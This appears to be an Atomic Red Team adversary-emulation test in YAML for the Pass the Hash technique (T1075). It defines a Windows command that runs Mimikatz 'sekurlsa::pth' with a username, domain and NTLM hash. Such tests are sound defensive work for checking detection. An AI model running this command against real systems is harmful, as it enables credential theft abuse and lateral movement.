Makenzie Schwartz
32 lines
710 B
YAML
32 lines
710 B
YAML
---
|
|
attack_technique: T1075
|
|
display_name: Pass the Hash
|
|
|
|
atomic_tests:
|
|
- name: Mimikatz Pass the Hash
|
|
description: |
|
|
Note: must dump hashes first
|
|
[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
user_name:
|
|
description: username
|
|
type: string
|
|
default: Administrator
|
|
domain:
|
|
description: domain
|
|
type: string
|
|
default: atomic.local
|
|
ntlm:
|
|
description: ntlm hash
|
|
type: string
|
|
default: cc36cf7a8514893efccd3324464tkg1a
|
|
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
|